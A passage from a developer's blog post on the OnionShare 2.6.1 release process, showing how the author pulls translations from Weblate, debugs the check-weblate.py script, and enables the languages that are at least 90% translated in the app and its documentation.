<li>Bug fix: Fix packaging issue where Windows version of OnionShare conflicts with Windows version of Dangerzone</li>
</ul>
<h2 id="ensuring-the-documentation-is-up-to-date">Ensuring the documentation is up-to-date</h2><p>This release doesn't add any new features, so fortunately I don't have to spend any time documenting them all. It's mostly bug fixes, updating dependencies, and revamping how releases are made (thanks to automated builds with a GitHub Actions workflow).</p>
<h2 id="ensuring-the-localization-is-up-to-date">Ensuring the localization is up-to-date</h2><p>Volunteers on Weblate (often with the help of <a href="https://www.localizationlab.org/">Localization Lab</a>) translate all of the strings in the OnionShare desktop app into <a href="https://hosted.weblate.org/projects/onionshare/translations/">many different languages</a>. Likewise, they also translate the documentation, as well as the strings in the mobile apps. Right now there's no consistent list of languages that OnionShare supports. Basically whenever I make a release, if OnionShare has been at least 90% translated into a language, then we include that language in the release. Otherwise, we don't.</p>
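<p>That 90% cutoff is simple enough to express as a filter. Here's a sketch of the policy (not code from the repo; the sample percentages below are taken from the <code>check-weblate.py</code> output later in this post):</p>

```python
def languages_to_enable(percents: dict, threshold: float = 90.0) -> list:
    """Return the sorted language codes that meet the release cutoff."""
    return sorted(code for code, pct in percents.items() if pct >= threshold)

# A few values in the shape check-weblate.py reports
sample = {"af": 100.0, "hr": 98.4, "bn": 88.2, "ro": 50.3}
```

With the default 90% threshold, Afrikaans and Croatian make the cut here, while Bengali at 88.2% just misses it.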
<h3 id="updating-the-onionshare-desktop-strings">Updating the OnionShare desktop strings</h3><p>After volunteers translate the English strings into other languages, Weblate makes commits with those new strings into its own git repo at <a href="https://hosted.weblate.org/projects/onionshare/translations/">https://hosted.weblate.org/projects/onionshare/translations/</a>. I need to make sure that my local <code>onionshare</code> folder has this as a git remote called <code>weblate</code>, like this:</p>
<div class="hll"><pre><span></span>git<span class="w"> </span>remote<span class="w"> </span>add<span class="w"> </span>weblate<span class="w"> </span>https://hosted.weblate.org/projects/onionshare/translations/
</pre></div>
<p>Then I pull in all of the latest localization changes from Weblate:</p>
<div class="hll"><pre><span></span>git<span class="w"> </span>pull<span class="w"> </span>weblate<span class="w"> </span>main
</pre></div>
<p>That's all I need to do to update the translations for the desktop app. However, I still need to determine which languages have been at least 90% translated so I can know whether or not to include them in the language-changing drop-down menu in OnionShare's Settings tab.</p>
<h3 id="checking-for-languages-with-that-are-at-least-90-translated">Checking for languages that are at least 90% translated</h3><p>To check this, I need to run the script <code>docs/check-weblate.py</code>, passing in my Weblate API key. This script uses the Weblate API to determine the percentage of the strings that have been translated into each language, for both the desktop app and the documentation:</p>
<pre><code>$ cd docs
$ poetry run ./check-weblate.py $WEBLATE_API_KEY
GET https://hosted.weblate.org/api/projects/onionshare/languages/
Traceback (most recent call last):
  File "/Users/user/code/onionshare/docs/./check-weblate.py", line 146, in <module>
    asyncio.run(main())
  File "/opt/homebrew/Cellar/python@3.11/3.11.5/Frameworks/Python.framework/Versions/3.11/lib/python3.11/asyncio/runners.py", line 190, in run
    return runner.run(main)
           ^^^^^^^^^^^^^^^^
  File "/opt/homebrew/Cellar/python@3.11/3.11.5/Frameworks/Python.framework/Versions/3.11/lib/python3.11/asyncio/runners.py", line 118, in run
    return self._loop.run_until_complete(task)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/opt/homebrew/Cellar/python@3.11/3.11.5/Frameworks/Python.framework/Versions/3.11/lib/python3.11/asyncio/base_events.py", line 653, in run_until_complete
    return future.result()
           ^^^^^^^^^^^^^^^
  File "/Users/user/code/onionshare/docs/./check-weblate.py", line 113, in main
    languages[obj["code"]] = obj["language"]
                             ~~~^^^^^^^^^^^^
KeyError: 'language'
</code></pre>
<p>And... I've hit another problem! Let me take a minute to debug this.</p>
<p><em>🎵 Debugging noises... 🎵</em></p>
<p>Okay, fixed. It turns out the Weblate API has slightly changed since the last time I made a release (it's been almost a year). Making a request to <a href="https://hosted.weblate.org/api/projects/onionshare/languages/">https://hosted.weblate.org/api/projects/onionshare/languages/</a> returns a list of objects, with each object representing a language that was included in the OnionShare project. Each language object includes the name of the language, like <code>Uyghur</code>, and the language code, like <code>ug</code>. The key for the name of the language used to be <code>language</code>, and the key for the language code was <code>code</code>. It turns out the name of the language now uses the key <code>name</code> instead of <code>language</code>. So, I fixed it by changing this line:</p>
<div class="hll"><pre><span></span><span class="n">languages</span><span class="p">[</span><span class="n">obj</span><span class="p">[</span><span class="s2">"code"</span><span class="p">]]</span> <span class="o">=</span> <span class="n">obj</span><span class="p">[</span><span class="s2">"language"</span><span class="p">]</span>
</pre></div>
<p>To this:</p>
<div class="hll"><pre><span></span><span class="n">languages</span><span class="p">[</span><span class="n">obj</span><span class="p">[</span><span class="s2">"code"</span><span class="p">]]</span> <span class="o">=</span> <span class="n">obj</span><span class="p">[</span><span class="s2">"name"</span><span class="p">]</span>
</pre></div>
<p>Okay, the <code>check-weblate.py</code> script should work now, though it takes a long time to finish running. The OnionShare project has 70 languages listed in Weblate, so it makes 70 HTTP requests for the OnionShare desktop app strings, one for each language, and also another 70 HTTP requests for each of the nine pages of OnionShare documentation. In order to avoid hammering the Weblate server, it waits one second between HTTP requests, meaning that it spends 700 seconds (or 11 minutes and 40 seconds) just waiting between HTTP requests.</p>
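<p>The pacing logic boils down to a sleep between sequential requests. A minimal sketch of that pattern, with <code>fetch_one</code> as a stand-in for the real HTTP call against the Weblate API (this is not the actual <code>check-weblate.py</code> code):</p>

```python
import asyncio

async def fetch_one(url: str) -> str:
    # Stand-in for the real HTTP GET against the Weblate API
    return f"response for {url}"

async def fetch_all(urls, delay: float = 1.0) -> list:
    """Fetch URLs one at a time, pausing `delay` seconds between
    requests so the server isn't hammered. At one request per second,
    700 requests means roughly 700 seconds spent just waiting."""
    results = []
    for i, url in enumerate(urls):
        if i > 0:
            await asyncio.sleep(delay)
        results.append(await fetch_one(url))
    return results
```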
<p>Here's what happens when I run it:</p>
<pre><code>$ poetry run ./check-weblate.py $WEBLATE_API_KEY
GET https://hosted.weblate.org/api/projects/onionshare/languages/
GET https://hosted.weblate.org/api/translations/onionshare/translations/af/
GET https://hosted.weblate.org/api/translations/onionshare/translations/sq/
GET https://hosted.weblate.org/api/translations/onionshare/translations/am/
GET https://hosted.weblate.org/api/translations/onionshare/translations/ar/
GET https://hosted.weblate.org/api/translations/onionshare/translations/hy/
GET https://hosted.weblate.org/api/translations/onionshare/translations/ay/
GET https://hosted.weblate.org/api/translations/onionshare/translations/be/
GET https://hosted.weblate.org/api/translations/onionshare/translations/bn/
GET https://hosted.weblate.org/api/translations/onionshare/translations/bs/
GET https://hosted.weblate.org/api/translations/onionshare/translations/bg/
GET https://hosted.weblate.org/api/translations/onionshare/translations/ca/
GET https://hosted.weblate.org/api/translations/onionshare/translations/zh_Hans/
GET https://hosted.weblate.org/api/translations/onionshare/translations/zh_Hant/
GET https://hosted.weblate.org/api/translations/onionshare/translations/hr/
GET https://hosted.weblate.org/api/translations/onionshare/translations/cs/
GET https://hosted.weblate.org/api/translations/onionshare/translations/da/
GET https://hosted.weblate.org/api/translations/onionshare/translations/nl/
GET https://hosted.weblate.org/api/translations/onionshare/translations/en/
GET https://hosted.weblate.org/api/translations/onionshare/translations/eo/ | error 404
GET https://hosted.weblate.org/api/translations/onionshare/translations/fil/
GET https://hosted.weblate.org/api/translations/onionshare/translations/fi/
GET https://hosted.weblate.org/api/translations/onionshare/translations/fr/
GET https://hosted.weblate.org/api/translations/onionshare/translations/gl/
GET https://hosted.weblate.org/api/translations/onionshare/translations/ka/
GET https://hosted.weblate.org/api/translations/onionshare/translations/de/
GET https://hosted.weblate.org/api/translations/onionshare/translations/el/
GET https://hosted.weblate.org/api/translations/onionshare/translations/gu/
GET https://hosted.weblate.org/api/translations/onionshare/translations/he/
GET https://hosted.weblate.org/api/translations/onionshare/translations/hi/
GET https://hosted.weblate.org/api/translations/onionshare/translations/hu/
GET https://hosted.weblate.org/api/translations/onionshare/translations/is/
GET https://hosted.weblate.org/api/translations/onionshare/translations/id/
GET https://hosted.weblate.org/api/translations/onionshare/translations/ga/
GET https://hosted.weblate.org/api/translations/onionshare/translations/it/
GET https://hosted.weblate.org/api/translations/onionshare/translations/ja/
GET https://hosted.weblate.org/api/translations/onionshare/translations/km/
GET https://hosted.weblate.org/api/translations/onionshare/translations/ko/
GET https://hosted.weblate.org/api/translations/onionshare/translations/ckb/
GET https://hosted.weblate.org/api/translations/onionshare/translations/lt/
GET https://hosted.weblate.org/api/translations/onionshare/translations/lg/
GET https://hosted.weblate.org/api/translations/onionshare/translations/mk/
GET https://hosted.weblate.org/api/translations/onionshare/translations/ms/
GET https://hosted.weblate.org/api/translations/onionshare/translations/nb_NO/
GET https://hosted.weblate.org/api/translations/onionshare/translations/om/ | error 404
GET https://hosted.weblate.org/api/translations/onionshare/translations/fa/
GET https://hosted.weblate.org/api/translations/onionshare/translations/pl/
GET https://hosted.weblate.org/api/translations/onionshare/translations/pt_BR/
GET https://hosted.weblate.org/api/translations/onionshare/translations/pt_PT/
GET https://hosted.weblate.org/api/translations/onionshare/translations/pa/
GET https://hosted.weblate.org/api/translations/onionshare/translations/ro/
GET https://hosted.weblate.org/api/translations/onionshare/translations/ru/
GET https://hosted.weblate.org/api/translations/onionshare/translations/sr_Latn/
GET https://hosted.weblate.org/api/translations/onionshare/translations/sn/
GET https://hosted.weblate.org/api/translations/onionshare/translations/si/
GET https://hosted.weblate.org/api/translations/onionshare/translations/sk/
GET https://hosted.weblate.org/api/translations/onionshare/translations/sl/
GET https://hosted.weblate.org/api/translations/onionshare/translations/es/
GET https://hosted.weblate.org/api/translations/onionshare/translations/sw/
GET https://hosted.weblate.org/api/translations/onionshare/translations/sv/
GET https://hosted.weblate.org/api/translations/onionshare/translations/tl/
GET https://hosted.weblate.org/api/translations/onionshare/translations/ta/
GET https://hosted.weblate.org/api/translations/onionshare/translations/te/
GET https://hosted.weblate.org/api/translations/onionshare/translations/bo/
GET https://hosted.weblate.org/api/translations/onionshare/translations/tr/
GET https://hosted.weblate.org/api/translations/onionshare/translations/tk/ | error 404
GET https://hosted.weblate.org/api/translations/onionshare/translations/uk/
GET https://hosted.weblate.org/api/translations/onionshare/translations/ug/
GET https://hosted.weblate.org/api/translations/onionshare/translations/vi/
GET https://hosted.weblate.org/api/translations/onionshare/translations/wo/
GET https://hosted.weblate.org/api/translations/onionshare/translations/yo/
GET https://hosted.weblate.org/api/translations/onionshare/doc-advanced/af/
GET https://hosted.weblate.org/api/translations/onionshare/doc-advanced/sq/
--snip--
GET https://hosted.weblate.org/api/translations/onionshare/doc-tor/wo/
GET https://hosted.weblate.org/api/translations/onionshare/doc-tor/yo/
Traceback (most recent call last):
  File "/Users/user/code/onionshare/docs/./check-weblate.py", line 146, in <module>
    asyncio.run(main())
  File "/opt/homebrew/Cellar/python@3.11/3.11.5/Frameworks/Python.framework/Versions/3.11/lib/python3.11/asyncio/runners.py", line 190, in run
    return runner.run(main)
           ^^^^^^^^^^^^^^^^
  File "/opt/homebrew/Cellar/python@3.11/3.11.5/Frameworks/Python.framework/Versions/3.11/lib/python3.11/asyncio/runners.py", line 118, in run
    return self._loop.run_until_complete(task)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/opt/homebrew/Cellar/python@3.11/3.11.5/Frameworks/Python.framework/Versions/3.11/lib/python3.11/asyncio/base_events.py", line 653, in run_until_complete
    return future.result()
           ^^^^^^^^^^^^^^^
  File "/Users/user/code/onionshare/docs/./check-weblate.py", line 136, in main
    await app_percent_output(90, 101)
  File "/Users/user/code/onionshare/docs/./check-weblate.py", line 53, in app_percent_output
    app_translations[lang_code] >= percent_min
    ~~~~~~~~~~~~~~~~^^^^^^^^^^^
KeyError: 'eo'
</code></pre>
<p>Eek, I've hit another issue. And unfortunately I hit it <em>after</em> making all of those HTTP requests. This means that once I fix it, I'll have to make them all over again. Alright, hang on while I fix this...</p>
<p><em>🎵 Debugging noises... 🎵</em></p>
<p>Fixed it. The problem here is that Esperanto (the language with code <code>eo</code>) was listed in the OnionShare Weblate project, but no one had started translating the OnionShare app itself into that language. That's why, if you look back at the output, the Weblate API returned a 404 when making the <code>eo</code> request:</p>
<pre><code>GET https://hosted.weblate.org/api/translations/onionshare/translations/eo/ | error 404
</code></pre>
<p>The solution here is to just make the <code>check-weblate.py</code> script less brittle, by making sure a language exists before checking what percentage of it has been translated. I do that by replacing this if statement:</p>
<div class="hll"><pre><span></span><span class="k">if</span> <span class="p">(</span>
<span class="n">app_translations</span><span class="p">[</span><span class="n">lang_code</span><span class="p">]</span> <span class="o">>=</span> <span class="n">percent_min</span>
<span class="ow">and</span> <span class="n">app_translations</span><span class="p">[</span><span class="n">lang_code</span><span class="p">]</span> <span class="o"><</span> <span class="n">percent_max</span>
<span class="p">):</span>
</pre></div>
<p>With this one:</p>
<div class="hll"><pre><span></span><span class="k">if</span> <span class="p">(</span>
<span class="n">lang_code</span> <span class="ow">in</span> <span class="n">app_translations</span>
<span class="ow">and</span> <span class="n">app_translations</span><span class="p">[</span><span class="n">lang_code</span><span class="p">]</span> <span class="o">>=</span> <span class="n">percent_min</span>
<span class="ow">and</span> <span class="n">app_translations</span><span class="p">[</span><span class="n">lang_code</span><span class="p">]</span> <span class="o"><</span> <span class="n">percent_max</span>
<span class="p">):</span>
</pre></div>
<p>Alright, the third time's a charm:</p>
<pre><code>$ poetry run ./check-weblate.py $WEBLATE_API_KEY
GET https://hosted.weblate.org/api/projects/onionshare/languages/
GET https://hosted.weblate.org/api/translations/onionshare/translations/af/
--snip--
GET https://hosted.weblate.org/api/translations/onionshare/doc-tor/wo/
GET https://hosted.weblate.org/api/translations/onionshare/doc-tor/yo/
App translations >= 90%
=======================
Afrikaans (af), 100.0%
Albanian (sq), 99.2%
Arabic (ar), 100.0%
Belarusian (be), 100.0%
Catalan (ca), 100.0%
Chinese (Simplified) (zh_Hans), 100.0%
Chinese (Traditional) (zh_Hant), 100.0%
Croatian (hr), 98.4%
Czech (cs), 100.0%
English (en), 100.0%
Finnish (fi), 100.0%
French (fr), 100.0%
German (de), 100.0%
Greek (el), 100.0%
Icelandic (is), 100.0%
Italian (it), 91.7%
Japanese (ja), 100.0%
Lithuanian (lt), 99.2%
Norwegian Bokmål (nb_NO), 90.2%
Persian (fa), 98.8%
Polish (pl), 100.0%
Portuguese (Brazil) (pt_BR), 99.6%
Russian (ru), 99.2%
Shona (sn), 98.8%
Spanish (es), 100.0%
Swahili (sw), 99.2%
Swedish (sv), 99.2%
Turkish (tr), 100.0%
Ukrainian (uk), 100.0%
Vietnamese (vi), 100.0%
App translations >= 50%
=======================
Bengali (bn), 88.2%
Danish (da), 67.9%
Dutch (nl), 73.8%
Galician (gl), 82.4%
Indonesian (id), 68.3%
Irish (ga), 53.5%
Khmer (Central) (km), 83.2%
Kurdish (Central) (ckb), 64.0%
Portuguese (Portugal) (pt_PT), 84.7%
Romanian (ro), 50.3%
Serbian (latin) (sr_Latn), 75.7%
Slovak (sk), 64.0%
App translations >= 0%
=======================
Amharic (am), 1.1%
Armenian (hy), 0.0%
Aymara (ay), 0.0%
Bosnian (bs), 0.0%
Bulgarian (bg), 35.1%
Filipino (fil), 0.0%
Georgian (ka), 1.9%
Gujarati (gu), 4.2%
Hebrew (he), 9.3%
Hindi (hi), 39.8%
Hungarian (hu), 28.5%
Korean (ko), 28.1%
Luganda (lg), 0.0%
Macedonian (mk), 2.7%
Malay (ms), 5.0%
Punjabi (pa), 1.1%
Sinhala (si), 0.7%
Slovenian (sl), 10.5%
Tagalog (tl), 0.0%
Tamil (ta), 0.0%
Telugu (te), 48.4%
Tibetan (bo), 0.0%
Uyghur (ug), 0.0%
Wolof (wo), 0.0%
Yoruba (yo), 8.5%
Docs translations >= 90%
========================
English (en), 100%
French (fr), 100%
Greek (el), 100%
Polish (pl), 100%
Spanish (es), 100%
Turkish (tr), 100%
Ukrainian (uk), 100%
Vietnamese (vi), 100%
Docs translations >= 50%
========================
Afrikaans (af), 81%
Chinese (Simplified) (zh_Hans), 59%
Chinese (Traditional) (zh_Hant), 59%
Czech (cs), 59%
Finnish (fi), 69%
German (de), 79%
Italian (it), 76%
Japanese (ja), 60%
Khmer (Central) (km), 77%
Norwegian Bokmål (nb_NO), 76%
Portuguese (Brazil) (pt_BR), 84%
Portuguese (Portugal) (pt_PT), 54%
Russian (ru), 79%
Swahili (sw), 74%
Swedish (sv), 65%
Docs translations >= 0%
========================
Arabic (ar), 40%
Belarusian (be), 33%
Bengali (bn), 29%
Bulgarian (bg), 16%
Catalan (ca), 36%
Croatian (hr), 30%
Dutch (nl), 43%
Filipino (fil), 13%
Galician (gl), 27%
Icelandic (is), 22%
Indonesian (id), 15%
Irish (ga), 22%
Korean (ko), 43%
Kurdish (Central) (ckb), 39%
Lithuanian (lt), 5%
Serbian (latin) (sr_Latn), 31%
Slovak (sk), 30%
</code></pre>
<p>Excellent, now I know which languages to enable in the OnionShare app, as well as which languages to enable in the documentation.</p>
<h3 id="enabling-languages-in-the-onionshare-app">Enabling languages in the OnionShare app</h3><p>I'll add the newly translated languages to OnionShare in a minute, but first I will update the internal lists of country names--one list per language, with the country names translated into that language.</p>
<p>OnionShare has a <a href="https://micahflee.com/2022/10/new-censorship-circumvention-features-come-to-onionshare-26/">censorship circumvention workflow</a> that can attempt to automatically connect even if you're in a place that blocks access to Tor. For this to work, though, it needs to know what country you're in to guess which censorship circumvention technique is most likely to work. It can automatically detect your country based on your IP address, or alternatively you can specify what country you're in. If your language is set to, say, Vietnamese, then when you select your country, the list of country names should be written in Vietnamese. That's why OnionShare includes these country name lists.</p>
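<p>Conceptually, each country-name list is a per-language mapping from country code to localized name. Here's an illustrative sketch of that shape (this is not the actual file format OnionShare uses, and the dictionary below is just a hypothetical excerpt):</p>

```python
# Illustrative per-language country-name list: ISO code -> name
# localized into Vietnamese (hypothetical excerpt, not real data files)
countries_vi = {
    "US": "Hoa Kỳ",     # United States
    "FR": "Pháp",       # France
    "VN": "Việt Nam",   # Vietnam
}

def country_choices(localized: dict) -> list:
    """Return (code, localized name) pairs sorted by display name,
    the order a country-selection drop-down would want."""
    return sorted(localized.items(), key=lambda kv: kv[1])
```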
<p>To update the translations of country names, I ran this:</p>
<div class="hll"><pre><span></span>poetry<span class="w"> </span>run<span class="w"> </span>python<span class="w"> </span>./scripts/countries-update-list.py
</pre></div>
<p>Great. Next, I want to enable the correct languages. From the <code>check-weblate.py</code> output above, I can tell that I should enable the following languages in the OnionShare desktop app for this release:</p>
<ul>
<li>Afrikaans (af), 100.0%</li>
<li>Albanian (sq), 99.2%</li>
<li>Arabic (ar), 100.0%</li>
<li>Belarusian (be), 100.0%</li>
<li>Catalan (ca), 100.0%</li>
<li>Chinese (Simplified) (zh_Hans), 100.0%</li>
<li>Chinese (Traditional) (zh_Hant), 100.0%</li>
<li>Croatian (hr), 98.4%</li>
<li>Czech (cs), 100.0%</li>
<li>English (en), 100.0%</li>
<li>Finnish (fi), 100.0%</li>
<li>French (fr), 100.0%</li>
<li>German (de), 100.0%</li>
<li>Greek (el), 100.0%</li>
<li>Icelandic (is), 100.0%</li>
<li>Italian (it), 91.7%</li>
<li>Japanese (ja), 100.0%</li>
<li>Lithuanian (lt), 99.2%</li>
<li>Norwegian Bokmål (nb_NO), 90.2%</li>
<li>Persian (fa), 98.8%</li>
<li>Polish (pl), 100.0%</li>
<li>Portuguese (Brazil) (pt_BR), 99.6%</li>
<li>Russian (ru), 99.2%</li>
<li>Shona (sn), 98.8%</li>
<li>Spanish (es), 100.0%</li>
<li>Swahili (sw), 99.2%</li>
<li>Swedish (sv), 99.2%</li>
<li>Turkish (tr), 100.0%</li>
<li>Ukrainian (uk), 100.0%</li>
<li>Vietnamese (vi), 100.0%</li>
</ul>
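<p>The cutoff implied by this list is 90%: any language below that threshold doesn't get enabled. A minimal sketch of that filter (a hypothetical helper, not the actual <code>check-weblate.py</code>; the Khmer figure below is made up for illustration):</p>

```python
# Sketch of the >=90% completion cutoff implied by check-weblate.py's output.
def languages_to_enable(completion: dict, threshold: float = 90.0) -> list:
    """Return language codes whose translation completion meets the threshold."""
    return sorted(code for code, pct in completion.items() if pct >= threshold)

completion = {"it": 91.7, "nb_NO": 90.2, "km": 74.0, "sv": 99.2}
print(languages_to_enable(completion))  # → ['it', 'nb_NO', 'sv']
```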
<p>I do that by editing the <code>self.available_locales</code> dictionary in <code>cli/onionshare_cli/settings.py</code>. In OnionShare 2.6 there were only 10 languages enabled, but in version 2.6.1 there will be 30! The translators have been quite busy. Here's the new <code>self.available_locales</code> that I've added:</p>
<div class="hll"><pre><span></span><span class="c1"># Dictionary of available languages in this version of OnionShare,</span>
<span class="c1"># mapped to the language name, in that language</span>
<span class="bp">self</span><span class="o">.</span><span class="n">available_locales</span> <span class="o">=</span> <span class="p">{</span>
<span class="s2">"af"</span><span class="p">:</span> <span class="s2">"Afrikaans"</span><span class="p">,</span> <span class="c1"># Afrikaans</span>
<span class="s2">"sq"</span><span class="p">:</span> <span class="s2">"Shqip"</span><span class="p">,</span> <span class="c1"># Albanian</span>
<span class="s2">"ar"</span><span class="p">:</span> <span class="s2">"العربية"</span><span class="p">,</span> <span class="c1"># Arabic</span>
<span class="s2">"be"</span><span class="p">:</span> <span class="s2">"Беларуская"</span><span class="p">,</span> <span class="c1"># Belarusian</span>
<span class="c1"># "bn": "বাংলা", # Bengali</span>
<span class="s2">"ca"</span><span class="p">:</span> <span class="s2">"Català"</span><span class="p">,</span> <span class="c1"># Catalan</span>
<span class="s2">"zh_Hant"</span><span class="p">:</span> <span class="s2">"正體中文 (繁體)"</span><span class="p">,</span> <span class="c1"># Traditional Chinese</span>
<span class="s2">"zh_Hans"</span><span class="p">:</span> <span class="s2">"中文 (简体)"</span><span class="p">,</span> <span class="c1"># Simplified Chinese</span>
<span class="s2">"hr"</span><span class="p">:</span> <span class="s2">"Hrvatski"</span><span class="p">,</span> <span class="c1"># Croatian</span>
<span class="s2">"cs"</span><span class="p">:</span> <span class="s2">"čeština"</span><span class="p">,</span> <span class="c1"># Czech</span>
<span class="c1"># "da": "Dansk", # Danish</span>
<span class="c1"># "nl": "Nederlands", # Dutch</span>
<span class="s2">"en"</span><span class="p">:</span> <span class="s2">"English"</span><span class="p">,</span> <span class="c1"># English</span>
<span class="s2">"fi"</span><span class="p">:</span> <span class="s2">"Suomi"</span><span class="p">,</span> <span class="c1"># Finnish</span>
<span class="s2">"fr"</span><span class="p">:</span> <span class="s2">"Français"</span><span class="p">,</span> <span class="c1"># French</span>
<span class="c1"># "gl": "Galego", # Galician</span>
<span class="s2">"de"</span><span class="p">:</span> <span class="s2">"Deutsch"</span><span class="p">,</span> <span class="c1"># German</span>
<span class="s2">"el"</span><span class="p">:</span> <span class="s2">"Ελληνικά"</span><span class="p">,</span> <span class="c1"># Greek</span>
<span class="s2">"is"</span><span class="p">:</span> <span class="s2">"Íslenska"</span><span class="p">,</span> <span class="c1"># Icelandic</span>
<span class="c1"># "id": "Bahasa Indonesia", # Indonesian</span>
<span class="c1"># "ga": "Gaeilge", # Irish</span>
<span class="s2">"it"</span><span class="p">:</span> <span class="s2">"Italiano"</span><span class="p">,</span> <span class="c1"># Italian</span>
<span class="s2">"ja"</span><span class="p">:</span> <span class="s2">"日本語"</span><span class="p">,</span> <span class="c1"># Japanese</span>
<span class="c1"># "ckb": "Soranî", # Kurdish (Central)</span>
<span class="s2">"lt"</span><span class="p">:</span> <span class="s2">"Lietuvių Kalba"</span><span class="p">,</span> <span class="c1"># Lithuanian</span>
<span class="s2">"nb_NO"</span><span class="p">:</span> <span class="s2">"Norsk Bokmål"</span><span class="p">,</span> <span class="c1"># Norwegian Bokmål</span>
<span class="s2">"fa"</span><span class="p">:</span> <span class="s2">"فارسی"</span><span class="p">,</span> <span class="c1"># Persian</span>
<span class="s2">"pl"</span><span class="p">:</span> <span class="s2">"Polski"</span><span class="p">,</span> <span class="c1"># Polish</span>
<span class="s2">"pt_BR"</span><span class="p">:</span> <span class="s2">"Português (Brasil)"</span><span class="p">,</span> <span class="c1"># Portuguese Brazil</span>
<span class="c1"># "pt_PT": "Português (Portugal)", # Portuguese Portugal</span>
<span class="c1"># "ro": "Română", # Romanian</span>
<span class="s2">"ru"</span><span class="p">:</span> <span class="s2">"Русский"</span><span class="p">,</span> <span class="c1"># Russian</span>
<span class="s2">"sn"</span><span class="p">:</span> <span class="s2">"chiShona"</span><span class="p">,</span> <span class="c1"># Shona</span>
<span class="c1"># "sr_Latn": "Srpska (latinica)", # Serbian (latin)</span>
<span class="c1"># "sk": "Slovenčina", # Slovak</span>
<span class="s2">"es"</span><span class="p">:</span> <span class="s2">"Español"</span><span class="p">,</span> <span class="c1"># Spanish</span>
<span class="s2">"sw"</span><span class="p">:</span> <span class="s2">"Kiswahili"</span><span class="p">,</span> <span class="c1"># Swahili</span>
<span class="s2">"sv"</span><span class="p">:</span> <span class="s2">"Svenska"</span><span class="p">,</span> <span class="c1"># Swedish</span>
<span class="c1"># "te": "తెలుగు", # Telugu</span>
<span class="s2">"tr"</span><span class="p">:</span> <span class="s2">"Türkçe"</span><span class="p">,</span> <span class="c1"># Turkish</span>
<span class="s2">"uk"</span><span class="p">:</span> <span class="s2">"Українська"</span><span class="p">,</span> <span class="c1"># Ukrainian</span>
<span class="s2">"vi"</span><span class="p">:</span> <span class="s2">"Tiếng Việt"</span><span class="p">,</span> <span class="c1"># Vietnamese</span>
<span class="p">}</span>
</pre></div>
<p>This dictionary maps language codes to language names, written in that language. For most of these languages I had to look up how to write their names <a href="https://www.omniglot.com/language/names.htm">here</a>. Note that several languages in this code block are commented out--these are languages that were once included in OnionShare, but that I'm not enabling in this release since they aren't at least 90% translated this time around.</p>
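<p>Because languages come and go between releases, a user's saved locale might no longer be in the dictionary. Here's a hedged sketch of the fallback you'd want in that case (illustrative only, not OnionShare's actual settings code):</p>

```python
# Illustrative sketch: fall back to English when a previously saved locale
# is no longer in available_locales (e.g. it dropped below 90% translated).
available_locales = {"en": "English", "vi": "Tiếng Việt"}

def resolve_locale(saved: str) -> str:
    """Return the saved locale if it's still available, otherwise English."""
    return saved if saved in available_locales else "en"

print(resolve_locale("da"))  # → en
```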
<p>After making this change, I decided to test it out. I followed the <a href="https://github.com/onionshare/onionshare/blob/main/desktop/README.md">instructions</a> in <code>desktop/README.md</code> to make sure my computer has a working local development environment, and then I ran OnionShare from the source tree:</p>
<pre><code>poetry run onionshare -v
</code></pre>
<p>After connecting to Tor, I opened the Settings tab and sure enough, all of these languages are listed in the language dropdown:</p>
<p><img src="onionshare-languages.png" alt="The OnionShare language dropdown"></p>
<p>I ran OnionShare again, opened Settings, and changed my language to Tiếng Việt (Vietnamese). It prompted me (in Vietnamese) to restart OnionShare, and so I did. I then opened it again, and there we have it: OnionShare in Vietnamese.</p>
<p><img src="onionshare-vietnamese.png" alt="OnionShare in Vietnamese"></p>
<h3 id="enabling-languages-in-the-documentation">Enabling languages in the documentation</h3><p>From the <code>check-weblate.py</code> output above, I can tell that I should enable the following languages in the documentation for this release:</p>
<ul>
<li>English (en), 100%</li>
<li>French (fr), 100%</li>
<li>Greek (el), 100%</li>
<li>Polish (pl), 100%</li>
<li>Spanish (es), 100%</li>
<li>Turkish (tr), 100%</li>
<li>Ukrainian (uk), 100%</li>
<li>Vietnamese (vi), 100%</li>
</ul>
<p>I do that by editing <code>docs/source/conf.py</code> and updating the <code>languages</code> list of tuples. This time, the documentation will be translated into 8 languages. Here's the new <code>languages</code> list:</p>
<div class="hll"><pre><span></span><span class="n">languages</span> <span class="o">=</span> <span class="p">[</span>
<span class="p">(</span><span class="s2">"English"</span><span class="p">,</span> <span class="s2">"en"</span><span class="p">),</span> <span class="c1"># English</span>
<span class="p">(</span><span class="s2">"Français"</span><span class="p">,</span> <span class="s2">"fr"</span><span class="p">),</span> <span class="c1"># French</span>
<span class="c1"># ("Deutsch", "de"), # German</span>
<span class="p">(</span><span class="s2">"Ελληνικά"</span><span class="p">,</span> <span class="s2">"el"</span><span class="p">),</span> <span class="c1"># Greek</span>
<span class="c1"># ("Italiano", "it"), # Italian</span>
<span class="c1"># ("日本語", "ja"), # Japanese</span>
<span class="c1"># ("ភាសាខ្មែរ", "km"), # Khmer (Central)</span>
<span class="c1"># ("Norsk Bokmål", "nb_NO"), # Norwegian Bokmål</span>
<span class="p">(</span><span class="s2">"Polish"</span><span class="p">,</span> <span class="s2">"pl"</span><span class="p">),</span> <span class="c1"># Polish</span>
<span class="c1"># ("Portuguese (Brazil)", "pt_BR"), # Portuguese (Brazil)</span>
<span class="c1"># ("Русский", "ru"), # Russian</span>
<span class="p">(</span><span class="s2">"Español"</span><span class="p">,</span> <span class="s2">"es"</span><span class="p">),</span> <span class="c1"># Spanish</span>
<span class="c1"># ("Svenska", "sv"), # Swedish</span>
<span class="p">(</span><span class="s2">"Türkçe"</span><span class="p">,</span> <span class="s2">"tr"</span><span class="p">),</span> <span class="c1"># Turkish</span>
<span class="p">(</span><span class="s2">"Українська"</span><span class="p">,</span> <span class="s2">"uk"</span><span class="p">),</span> <span class="c1"># Ukrainian</span>
<span class="p">(</span><span class="s2">"Tiếng Việt"</span><span class="p">,</span> <span class="s2">"vi"</span><span class="p">),</span> <span class="c1"># Vietnamese</span>
<span class="p">]</span>
</pre></div>
<p>Unfortunately, in this release I'm commenting out documentation translations for Japanese, Khmer, and Swedish, since they didn't make the 90% threshold.</p>
<p>Next, I also need to edit <code>docs/build.sh</code> and update the <code>LOCALES</code> variable to include language codes for this same list of enabled languages. In this case it's:</p>
<div class="hll"><pre><span></span><span class="nv">LOCALES</span><span class="o">=</span><span class="s2">"en fr el pl es tr uk vi"</span>
</pre></div>
